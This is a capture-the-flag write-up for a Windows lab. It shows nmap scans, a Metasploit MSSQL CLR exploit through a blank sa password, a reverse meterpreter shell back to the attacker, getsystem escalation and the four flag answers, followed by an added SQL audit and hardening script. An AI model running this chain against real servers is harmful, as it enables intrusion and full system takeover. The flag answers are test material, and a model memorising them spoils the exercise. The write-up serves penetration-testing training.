The Metasploit Framework CTF 1
Overview¶
Windows systems are common targets in penetration testing due to their extensive use in corporate environments. This lab focuses on exploiting Windows-based services and configurations using the Metasploit Framework (MSF). Participants will gain hands-on experience accessing vulnerable services, exploring sensitive directories, and escalating privileges to retrieve hidden information.
The objective is to highlight the risks associated with misconfigured accounts, exposed directories, and improper privilege management in Windows environments.
In this lab environment, you will have GUI access to a Kali machine. The target machine will be accessible at target.ine.local.
Objective: Use Metasploit and manual investigation techniques to capture the following flags:
Flag 1: Gain access to the MSSQLSERVER account on the target machine to retrieve the first flag.
Flag 2: Locate the second flag within the Windows configuration folder.
Flag 3: The third flag is also hidden within the system directory. Find it to uncover a hint for accessing the final flag.
Flag 4: Investigate the Administrator directory to find the fourth flag.
Writeup¶
Flag 1¶
Let's start with an nmap scan:
┌──(root㉿INE)-[~]
└─# nmap -p- target.ine.local --min-rate=10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-08 18:00 IST
Nmap scan report for target.ine.local (10.4.16.160)
Host is up (0.011s latency).
Not shown: 65517 closed tcp ports (reset)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1433/tcp open ms-sql-s
2019/tcp filtered whosockami
3389/tcp open ms-wbt-server
5985/tcp open wsman
25741/tcp filtered unknown
44573/tcp filtered unknown
47001/tcp open winrm
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49180/tcp open unknown
49181/tcp open unknown
49192/tcp open unknown
58545/tcp filtered unknown
Nmap done: 1 IP address (1 host up) scanned in 13.44 seconds
Run nmap with default scripts and version detection against just the ports the first scan reported (the open port numbers from that output, saved as a single comma-separated line in Desktop/ports.txt, which the backticks splice into -p):
┌──(root㉿INE)-[~]
└─# nmap -p`cat Desktop/ports.txt` -sC -sV target.ine.local
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-08 18:01 IST
Stats: 0:01:01 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 92.86% done; ETC: 18:02 (0:00:05 remaining)
Nmap scan report for target.ine.local (10.4.16.160)
Host is up (0.010s latency).
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1433/tcp open ms-sql-s Microsoft SQL Server 2012 11.00.6020.00; SP3
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-04-08T12:23:53
|_Not valid after: 2055-04-08T12:23:53
| ms-sql-ntlm-info:
| 10.4.16.160\MSSQLSERVER:
| Target_Name: WIN-5BQ22OKH4SO
| NetBIOS_Domain_Name: WIN-5BQ22OKH4SO
| NetBIOS_Computer_Name: WIN-5BQ22OKH4SO
| DNS_Domain_Name: WIN-5BQ22OKH4SO
| DNS_Computer_Name: WIN-5BQ22OKH4SO
|_ Product_Version: 6.3.9600
| ms-sql-info:
| 10.4.16.160\MSSQLSERVER:
| Instance name: MSSQLSERVER
| Version:
| name: Microsoft SQL Server 2012 SP3
| number: 11.00.6020.00
| Product: Microsoft SQL Server 2012
| Service pack level: SP3
| Post-SP patches applied: false
| TCP port: 1433
|_ Clustered: false
|_ssl-date: 2025-04-08T12:32:47+00:00; -1s from scanner time.
2019/tcp closed whosockami
3389/tcp open ssl/ms-wbt-server?
| rdp-ntlm-info:
| Target_Name: WIN-5BQ22OKH4SO
| NetBIOS_Domain_Name: WIN-5BQ22OKH4SO
| NetBIOS_Computer_Name: WIN-5BQ22OKH4SO
| DNS_Domain_Name: WIN-5BQ22OKH4SO
| DNS_Computer_Name: WIN-5BQ22OKH4SO
| Product_Version: 6.3.9600
|_ System_Time: 2025-04-08T12:32:40+00:00
| ssl-cert: Subject: commonName=WIN-5BQ22OKH4SO
| Not valid before: 2025-01-08T07:08:38
|_Not valid after: 2025-07-10T07:08:38
|_ssl-date: 2025-04-08T12:32:47+00:00; 0s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
25741/tcp closed unknown
44573/tcp closed unknown
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49180/tcp open msrpc Microsoft Windows RPC
49181/tcp open msrpc Microsoft Windows RPC
49192/tcp open msrpc Microsoft Windows RPC
58545/tcp closed unknown
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 3:0:2:
|_ Message signing enabled but not required
| smb2-time:
| date: 2025-04-08T12:32:40
|_ start_date: 2025-04-08T12:23:52
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 74.32 seconds
Open Metasploit and import the nmap results into its database (db_import reads nmap's -oX XML output; db_nmap scans straight into the database), then list the recorded services and look for something exploitable:
msf6 > services
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
10.4.16.160 135 tcp msrpc open Microsoft Windows RPC
10.4.16.160 139 tcp netbios-ssn open Microsoft Windows netbios-ssn
10.4.16.160 445 tcp microsoft-ds open Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
10.4.16.160 1433 tcp ms-sql-s open Microsoft SQL Server 2012 11.00.6020.00; SP3
10.4.16.160 2019 tcp whosockami closed
10.4.16.160 3389 tcp ssl/ms-wbt-server open
10.4.16.160 5985 tcp http open Microsoft HTTPAPI httpd 2.0 SSDP/UPnP
10.4.16.160 25741 tcp closed
10.4.16.160 44573 tcp closed
10.4.16.160 47001 tcp http open Microsoft HTTPAPI httpd 2.0 SSDP/UPnP
10.4.16.160 49152 tcp msrpc open Microsoft Windows RPC
10.4.16.160 49153 tcp msrpc open Microsoft Windows RPC
10.4.16.160 49154 tcp msrpc open Microsoft Windows RPC
10.4.16.160 49155 tcp msrpc open Microsoft Windows RPC
10.4.16.160 49180 tcp msrpc open Microsoft Windows RPC
10.4.16.160 49181 tcp msrpc open Microsoft Windows RPC
10.4.16.160 49192 tcp msrpc open Microsoft Windows RPC
10.4.16.160 58545 tcp closed
msf6 > search Mssql 2012
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/mssql/mssql_clr_payload 1999-01-01 excellent Yes Microsoft SQL Server Clr Stored Procedure Payload Execution
1 exploit/windows/mssql/mssql_linkcrawler 2000-01-01 great No Microsoft SQL Server Database Link Crawling Command Execution
2 post/windows/manage/mssql_local_auth_bypass . normal No Windows Manage Local Microsoft SQL Server Authorization Bypass
Interact with a module by name or index. For example info 2, use 2 or use post/windows/manage/mssql_local_auth_bypass
msf6 >
Set the necessary options (RHOSTS to the target; USERNAME stays at its default of sa and PASSWORD stays empty) and try it:
msf6 exploit(windows/mssql/mssql_clr_payload) > run
[*] Started reverse TCP handler on 10.10.39.3:4444
[!] 10.4.16.160:1433 - Setting EXITFUNC to 'thread' so we don't kill SQL Server
[-] 10.4.16.160:1433 - Exploit aborted due to failure: bad-config: Target SQL server arch is x64, payload architecture is x86
[*] Exploit completed, but no session was created.
msf6 exploit(windows/mssql/mssql_clr_payload) >
The module's default payload is 32-bit, but the CLR assembly it loads runs inside the 64-bit sqlservr.exe process, so the payload has to match that architecture. Use the x64 meterpreter payload:
msf6 exploit(windows/mssql/mssql_clr_payload) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/mssql/mssql_clr_payload) > show options
Module options (exploit/windows/mssql/mssql_clr_payload):
Name Current Setting Required Description
---- --------------- -------- -----------
DATABASE master yes The database to load the CLR Assembly into.
PASSWORD no The password for the specified username
RHOSTS target.ine.local yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 1433 yes The target port (TCP)
USERNAME sa no The username to authenticate as
USE_WINDOWS_AUTHENT false yes Use windows authentication (requires DOMAIN option set)
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.39.3 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
msf6 exploit(windows/mssql/mssql_clr_payload) > run
[*] Started reverse TCP handler on 10.10.39.3:4444
[!] 10.4.16.160:1433 - Setting EXITFUNC to 'thread' so we don't kill SQL Server
[*] 10.4.16.160:1433 - Database does not have TRUSTWORTHY setting on, enabling ...
[*] 10.4.16.160:1433 - Database does not have CLR support enabled, enabling ...
[*] 10.4.16.160:1433 - Using version v3.5 of the Payload Assembly
[*] 10.4.16.160:1433 - Adding custom payload assembly ...
[*] 10.4.16.160:1433 - Exposing payload execution stored procedure ...
[*] 10.4.16.160:1433 - Executing the payload ...
[*] 10.4.16.160:1433 - Removing stored procedure ...
[*] 10.4.16.160:1433 - Removing assembly ...
[*] Sending stage (201798 bytes) to 10.4.16.160
[*] 10.4.16.160:1433 - Restoring CLR setting ...
[*] 10.4.16.160:1433 - Restoring Trustworthy setting ...
[*] Meterpreter session 1 opened (10.10.39.3:4444 -> 10.4.16.160:49456) at 2025-04-08 18:27:43 +0530
meterpreter >
We have a shell, obtained with nothing more than the sa login and an empty password; the session runs as the SQL Server service account. Drop into a command prompt (meterpreter's shell command) and look at the root of C: for the first flag:
C:\Windows\system32>cd ../..
cd ../../
C:\>dir
dir
Volume in drive C has no label.
Volume Serial Number is 5CD6-020B
Directory of C:\
04/08/2025 12:24 PM 34 flag1.txt
08/22/2013 03:52 PM <DIR> PerfLogs
01/09/2025 07:00 AM <DIR> Program Files
12/15/2024 09:27 AM <DIR> Program Files (x86)
01/09/2025 07:12 AM <DIR> Users
01/09/2025 07:08 AM <DIR> Windows
1 File(s) 34 bytes
5 Dir(s) 3,738,730,496 bytes free
C:\>type flag1.txt
type flag1.txt
Answer
41bdcc800934491094bb43e0fbde5358
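The module's log lines above correspond to a handful of T-SQL statements on the server: it set TRUSTWORTHY ON for master, ran sp_configure 'clr enabled', 1, loaded the payload with CREATE ASSEMBLY ... WITH PERMISSION_SET = UNSAFE, exposed it with CREATE PROCEDURE ... AS EXTERNAL NAME, executed it, and then undid each step. The script below is an added example, not part of this writeup or of the Metasploit module: it audits the same preconditions (a login that accepts an empty password, CLR enabled, TRUSTWORTHY databases, leftover CLR objects), reports which Windows account the engine runs as (the identity of the shell just obtained, and the starting point for the getsystem step in Flag 2), and ends with the hardening statements. It assumes a sysadmin login on SQL Server 2008 R2 SP1 or later; the account name in the comment for query 5 is the default for a default instance and is not confirmed by the page, and the password in the hardening section is a placeholder.

```sql
-- Added example (not from the original writeup or the Metasploit module).
-- Audit of the conditions exploit/windows/mssql/mssql_clr_payload relied on,
-- followed by remediation. Run as a sysadmin login in SSMS or sqlcmd.

-- 1. Logins that accept an empty password. PWDCOMPARE hashes the candidate
--    against the stored hash, so this is exactly the check the module's
--    default USERNAME=sa / PASSWORD='' authentication passed.
SELECT name, is_disabled
FROM   sys.sql_logins
WHERE  PWDCOMPARE('', password_hash) = 1;

-- 2. Instance-level CLR switch. value_in_use = 1 means code loaded with
--    CREATE ASSEMBLY can execute; the module turned this on, then back off.
SELECT name, value, value_in_use
FROM   sys.configurations
WHERE  name = 'clr enabled';

-- 3. Databases marked TRUSTWORTHY. An UNSAFE assembly only loads into a
--    TRUSTWORTHY database (or a signed one), and when the owner is a
--    sysadmin that assembly runs with the service account's Windows rights.
SELECT d.name, d.is_trustworthy_on, SUSER_SNAME(d.owner_sid) AS owner_login
FROM   sys.databases AS d
WHERE  d.is_trustworthy_on = 1;

-- 4. Leftovers: user-defined assemblies and the CLR objects that expose
--    them. The module removes its own, but a real intruder may not.
SELECT a.name, a.permission_set_desc, a.create_date
FROM   master.sys.assemblies AS a
WHERE  a.is_user_defined = 1;

SELECT o.name, o.type_desc, o.create_date
FROM   master.sys.objects AS o
WHERE  o.type IN ('PC', 'FS', 'FT', 'AF');   -- CLR procs, functions, aggregates

-- 5. Which Windows account the engine runs as, i.e. whose token a CLR
--    payload executes under. For a default instance this is normally the
--    virtual account NT Service\MSSQLSERVER (assumption; the lab only
--    names it "the MSSQLSERVER account").
SELECT servicename, service_account
FROM   sys.dm_server_services;

-- Hardening: give sa a real password and disable it, turn CLR off, and
-- clear TRUSTWORTHY on every database query 3 listed that does not need it
-- (master is shown because that is the database the module used).
ALTER LOGIN sa WITH PASSWORD = 'ReplaceWithALongRandomPassword!';
ALTER LOGIN sa DISABLE;
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'clr enabled', 0;
RECONFIGURE;
ALTER DATABASE master SET TRUSTWORTHY OFF;
```

Run the SELECTs first: a row from the PWDCOMPARE query is the finding that made this box fall, and the module would have failed at the authentication step without it. Apply the ALTER and sp_configure statements only after confirming nothing legitimate depends on CLR or on a TRUSTWORTHY database, since both take effect as soon as RECONFIGURE runs.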
Flag 2¶
It probably refers to System32. Inside, I find a folder named config:
C:\Windows\system32>dir /ad
dir /ad
Volume in drive C has no label.
Volume Serial Number is 5CD6-020B
Directory of C:\Windows\system32
04/08/2025 12:27 PM <DIR> .
04/08/2025 12:27 PM <DIR> ..
03/18/2014 09:25 AM <DIR> 0409
12/15/2024 09:20 AM <DIR> 1033
08/22/2013 03:39 PM <DIR> AdvancedInstallers
08/22/2013 03:39 PM <DIR> AppLocker
09/09/2020 04:42 AM <DIR> Appraiser
03/18/2014 10:23 AM <DIR> ar-SA
02/23/2018 08:00 AM <DIR> awsrunPowerShellScript
08/22/2013 03:39 PM <DIR> BestPractices
03/18/2014 10:23 AM <DIR> bg-BG
04/14/2021 04:03 AM <DIR> Boot
12/15/2021 03:42 AM <DIR> catroot
12/15/2021 04:15 AM <DIR> catroot2
07/14/2021 04:08 AM <DIR> CodeIntegrity
11/18/2014 11:26 PM <DIR> Com
09/09/2020 04:42 AM <DIR> CompatTel
04/08/2025 12:44 PM <DIR> config
01/04/2022 03:37 AM <DIR> Configuration
03/18/2014 10:23 AM <DIR> cs-CZ
03/18/2014 10:23 AM <DIR> da-DK
...
C:\Windows\System32>cd config
cd config
Access is denied.
But access is denied: the service account we landed as cannot read C:\Windows\System32\config, where the registry hives (SAM, SECURITY, SYSTEM) live. Let's try getsystem. It succeeds with technique 5, named pipe impersonation, because the SQL Server service account holds SeImpersonatePrivilege (SQL Server setup grants it by default): meterpreter creates a named pipe, coerces the Print Spooler, which runs as SYSTEM, into connecting to it, and impersonates the client's token. Since the engine needs that privilege for normal operation, the practical defence is to keep attackers from reaching the service account at all, which here means the sa password and CLR settings from Flag 1.
meterpreter > getsystem
...got system via technique 5 (Named Pipe Impersonation (PrintSpooler variant)).
meterpreter > cd config
meterpreter > dir
Listing: C:\Windows\system32\config
===================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 8192 fil 2025-01-09 12:35:27 +0530 BBI
100666/rw-rw-rw- 8192 fil 2013-08-22 18:55:30 +0530 BBI.LOG1
100666/rw-rw-rw- 0 fil 2013-08-22 18:55:30 +0530 BBI.LOG2
100666/rw-rw-rw- 65536 fil 2013-08-22 18:55:44 +0530 BBI{42b8217e-0b2e-11e3-93f4-90b11c2eb9f2}.TM.blf
100666/rw-rw-rw- 524288 fil 2013-08-22 18:55:44 +0530 BBI{42b8217e-0b2e-11e3-93f4-90b11c2eb9f2}.TMContainer00000000000000000001.regtrans-ms
100666/rw-rw-rw- 524288 fil 2013-08-22 18:55:44 +0530 BBI{42b8217e-0b2e-11e3-93f4-90b11c2eb9f2}.TMContainer00000000000000000002.regtrans-ms
100666/rw-rw-rw- 262144 fil 2014-05-09 06:22:13 +0530 BCD-Template
100666/rw-rw-rw- 28672 fil 2013-08-22 21:16:48 +0530 BCD-Template.LOG
100666/rw-rw-rw- 0 fil 2014-03-18 15:11:56 +0530 BCD-Template.LOG1
100666/rw-rw-rw- 0 fil 2014-03-18 15:11:56 +0530 BCD-Template.LOG2
100666/rw-rw-rw- 101187584 fil 2025-04-08 18:14:16 +0530 COMPONENTS
100666/rw-rw-rw- 0 fil 2013-08-22 18:55:30 +0530 COMPONENTS.LOG
100666/rw-rw-rw- 880640 fil 2013-08-22 18:55:30 +0530 COMPONENTS.LOG1
100666/rw-rw-rw- 6574080 fil 2013-08-22 18:55:30 +0530 COMPONENTS.LOG2
100666/rw-rw-rw- 65536 fil 2025-04-08 18:14:16 +0530 COMPONENTS{9c9f9f6a-ae7e-11e3-80ba-0026b955dac2}.TM.blf
100666/rw-rw-rw- 524288 fil 2025-04-08 18:14:16 +0530 COMPONENTS{9c9f9f6a-ae7e-11e3-80ba-0026b955dac2}.TMContainer00000000000000000001.regtrans-ms
100666/rw-rw-rw- 524288 fil 2025-04-08 18:14:16 +0530 COMPONENTS{9c9f9f6a-ae7e-11e3-80ba-0026b955dac2}.TMContainer00000000000000000002.regtrans-ms
100666/rw-rw-rw- 2621440 fil 2025-01-09 12:43:03 +0530 DEFAULT
100666/rw-rw-rw- 0 fil 2013-08-22 18:55:30 +0530 DEFAULT.LOG
100666/rw-rw-rw- 2027520 fil 2013-08-22 18:55:30 +0530 DEFAULT.LOG1
100666/rw-rw-rw- 12288 fil 2013-08-22 18:55:30 +0530 DEFAULT.LOG2
100666/rw-rw-rw- 4521984 fil 2025-04-08 18:06:21 +0530 DRIVERS
100666/rw-rw-rw- 188416 fil 2013-08-22 21:04:27 +0530 DRIVERS.LOG1
100666/rw-rw-rw- 8192 fil 2013-08-22 21:04:27 +0530 DRIVERS.LOG2
100666/rw-rw-rw- 65536 fil 2021-12-15 09:31:38 +0530 DRIVERS{e50cbcff-0b3d-11e3-b794-c222b49a96f2}.TM.blf
100666/rw-rw-rw- 524288 fil 2021-12-15 09:31:38 +0530 DRIVERS{e50cbcff-0b3d-11e3-b794-c222b49a96f2}.TMContainer00000000000000000001.regtrans-ms
100666/rw-rw-rw- 524288 fil 2014-05-09 05:25:35 +0530 DRIVERS{e50cbcff-0b3d-11e3-b794-c222b49a96f2}.TMContainer00000000000000000002.regtrans-ms
100666/rw-rw-rw- 8192 fil 2013-08-22 18:55:30 +0530 ELAM
100666/rw-rw-rw- 0 fil 2013-08-22 18:55:30 +0530 ELAM.LOG1
100666/rw-rw-rw- 0 fil 2013-08-22 18:55:30 +0530 ELAM.LOG2
100666/rw-rw-rw- 164 fil 2013-08-22 18:59:29 +0530 FP
040777/rwxrwxrwx 0 dir 2013-08-22 18:55:43 +0530 Journal
040777/rwxrwxrwx 4096 dir 2025-04-08 18:03:57 +0530 RegBack
100666/rw-rw-rw- 262144 fil 2025-01-09 12:43:03 +0530 SAM
100666/rw-rw-rw- 36864 fil 2013-08-22 18:55:30 +0530 SAM.LOG1
100666/rw-rw-rw- 28672 fil 2013-08-22 18:55:30 +0530 SAM.LOG2
100666/rw-rw-rw- 262144 fil 2025-01-09 12:43:03 +0530 SECURITY
100666/rw-rw-rw- 0 fil 2013-08-22 18:55:30 +0530 SECURITY.LOG
100666/rw-rw-rw- 28672 fil 2013-08-22 18:55:30 +0530 SECURITY.LOG1
100666/rw-rw-rw- 8192 fil 2013-08-22 18:55:30 +0530 SECURITY.LOG2
100666/rw-rw-rw- 89653248 fil 2025-01-09 12:43:03 +0530 SOFTWARE
100666/rw-rw-rw- 0 fil 2013-08-22 18:55:30 +0530 SOFTWARE.LOG
100666/rw-rw-rw- 15355904 fil 2013-08-22 18:55:30 +0530 SOFTWARE.LOG1
100666/rw-rw-rw- 16384 fil 2013-08-22 18:55:30 +0530 SOFTWARE.LOG2
100666/rw-rw-rw- 12582912 fil 2025-01-09 12:43:03 +0530 SYSTEM
100666/rw-rw-rw- 0 fil 2013-08-22 18:55:30 +0530 SYSTEM.LOG
100666/rw-rw-rw- 12460032 fil 2013-08-22 18:55:30 +0530 SYSTEM.LOG1
100666/rw-rw-rw- 4153344 fil 2013-08-22 18:55:30 +0530 SYSTEM.LOG2
100666/rw-rw-rw- 65536 fil 2021-09-15 11:22:34 +0530 SYSTEM{9c9f9f4c-ae7e-11e3-80ba-0026b955dac2}.TM.blf
100666/rw-rw-rw- 524288 fil 2021-09-15 11:22:34 +0530 SYSTEM{9c9f9f4c-ae7e-11e3-80ba-0026b955dac2}.TMContainer00000000000000000001.regtrans-ms
100666/rw-rw-rw- 524288 fil 2021-09-15 11:22:34 +0530 SYSTEM{9c9f9f4c-ae7e-11e3-80ba-0026b955dac2}.TMContainer00000000000000000002.regtrans-ms
040777/rwxrwxrwx 8192 dir 2014-03-18 16:02:48 +0530 TxR
100666/rw-rw-rw- 34 fil 2025-04-08 17:54:27 +0530 flag2.txt
040777/rwxrwxrwx 4096 dir 2014-06-21 01:26:20 +0530 systemprofile
meterpreter > cat flag2.txt
meterpreter >
Answer
6bade9dad8754a1384a725a019085a26
Flag 3¶
Search System32 recursively for text files. The file name under drivers\etc spells out that this flag needed the escalation from the previous step:
C:\Windows\system32>dir /b /s "*.txt"
C:\Windows\system32\catroot2\dberr.txt
C:\Windows\system32\config\flag2.txt
C:\Windows\system32\config\systemprofile\AppData\Local\Amazon\Ec2Config\Logs\FrameworkLaunchException.txt
C:\Windows\system32\drivers\gmreadme.txt
C:\Windows\system32\drivers\etc\EscaltePrivilageToGetThisFlag.txt
C:\Windows\system32\en-US\erofflps.txt
C:\Windows\system32\WindowsPowerShell\v1.0\en-US\default.help.txt
C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitsTransfer\en-US\about_BITS_Cmdlets.help.txt
C:\Windows\system32>type drivers\etc\EscaltePrivilageToGetThisFlag.txt
type drivers\etc\EscaltePrivilageToGetThisFlag.txt
Answer
3df7b3d9f40d4fcd971ef528f6d63899
Flag 4¶
Navigate to the Administrator's Desktop, which the SYSTEM token we now hold lets us read:
C:\Windows\system32>cd ../../Users/Administrator
cd ../../Users/Administrator
C:\Users\Administrator>cd Desktop
cd Desktop
C:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 5CD6-020B
Directory of C:\Users\Administrator\Desktop
04/08/2025 01:21 PM <DIR> .
04/08/2025 01:21 PM <DIR> ..
04/08/2025 01:21 PM 34 flag4.txt
1 File(s) 34 bytes
2 Dir(s) 3,486,302,208 bytes free
C:\Users\Administrator\Desktop>type flag4.txt
type flag4.txt
Answer
8134e3279e464e3b8b6e01bcaa1e8ba4